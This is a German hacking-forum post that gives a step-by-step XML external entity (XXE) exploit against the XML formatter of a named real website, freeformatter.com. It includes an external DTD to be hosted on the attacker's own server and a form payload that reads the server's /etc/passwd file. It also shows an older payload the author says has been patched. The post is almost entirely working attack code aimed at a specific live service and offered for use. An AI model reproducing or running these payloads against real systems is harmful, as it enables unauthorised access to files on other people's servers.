Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

freeformatter.com - External Entity Injection

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Angreifbare URL:
http://www.freeformatter.com/xml-formatter.html

Zuerst laden wir diese Datei auf einen Server unserer Wahl:

lol.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM '%file;'>">
%all;

Dann geben wir im Feld "Option 1" folgendes ein:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://deinserver/lol.dtd">
%dtd;]>
<roottag>&send;</roottag>

Dann klicken wir auf "Format XML".

Auf der Seite ist zu lesen:
"A special thanks to Johannes Künsebeck for pointing out the XML Injection issue in my formatter!"

Anscheinend wurde in der Vergangenheit ein Versuch unternommen die Lücke zu schließen.
Dieser Code zeigt nämlich keine Dateien an:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

  • Ch!ller gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 38 user(s)


    , , <Kevin>, abramas, AdlerRhy, Aurus, BackBurner, berlingo21, BlackZetsu, Byom, Ch!ller, ChEeTaH182, curlz, Cyber-Agent, Download305, Dr. p0rk, easysurfer, FatalityMods, Framerater, Giannix, Goooofy, gpdy2k, ice, jack4flash, Mossinger, most_uniQue, n4pst3r, osibak, Sharky, smc2014, sniffer, Twix2010, ueEqlL, Unkiii, virgoFF, White-Warti, Xenio, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.